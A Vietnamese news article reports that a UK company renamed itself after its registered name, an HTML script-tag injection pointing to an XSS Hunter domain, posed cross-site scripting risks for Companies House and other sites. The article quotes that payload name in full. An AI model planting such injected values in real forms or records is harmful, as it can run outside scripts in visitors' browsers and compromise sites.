Một công ty ở Anh phải đổi tên vì sợ bị dùng để hack trang web

09/11/2020 11:46 GMT+7

Trước đây, một số công ty tự đặt cho mình những cái tên dựa trên mã lập trình chỉ để gây ấn tượng cho người khác, nhưng một trong số đó đã buộc phải thay đổi tên vì đứng trước nguy cơ bị hack.

Theo TheGuardian, một công ty ở Vương quốc Anh đã nghe lời một nhà tư vấn phần mềm thay đổi tên công ty của mình sau khi phát hiện chính tên công ty có thể dẫn tới các cuộc tấn công bằng dòng lệnh trên nhiều trang web, trong đó có cả Company House. Một trang web có thể đã vô tình tự biến thành “con mồi” chỉ vì vô tình đề cập đến tên công ty này.
Cái tên ban đầu của công ty, ““> <SCRIPT SRC = HTTPS: //MJT.XSS.HT> LTD, ”có nguy cơ gây nhầm lẫn cho các trang web không xử lý đúng định dạng HTML. Chúng sẽ cho rằng tên công ty bỏ trống và chạy một tập lệnh từ trang khắc phục sự cố XSS Hunter. Đó là một kịch bản vô thưởng vô phạt mà chỉ đơn giản là đưa ra một cảnh báo, nhưng Company House không muốn chấp nhận rủi ro. Người phát ngôn của công ty cho biết, cái tên này đã gây ra rủi ro bảo mật cho một số trang web khác.
Từ sự việc đó, nhà tư vấn đã đổi tên doanh nghiệp thành “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD” (công ty có tên được sử dụng để chứa HTML SCRIP TAGS LTD). Trong khi đó, công ty cho biết họ đã "áp dụng các biện pháp" để ngăn chặn sự lặp lại này, ít nhất là ở Anh.
Thật thú vị khi thấy một cái tên mã lệnh dài dòng và gây chú ý này đã gây rắc rối cho các công ty như thế nào, nhưng nó cũng cho thấy vấn đề của bảo mật web. Nếu một cái tên đủ sức tàn phá một trang web thì có nhiều việc phải làm trước khi chủ sở hữu của trang web đó tuyên bố trang chủ của họ đã được bảo mật tốt.
Top

Bạn không thể gửi bình luận liên tục. Xin hãy đợi
60 giây nữa.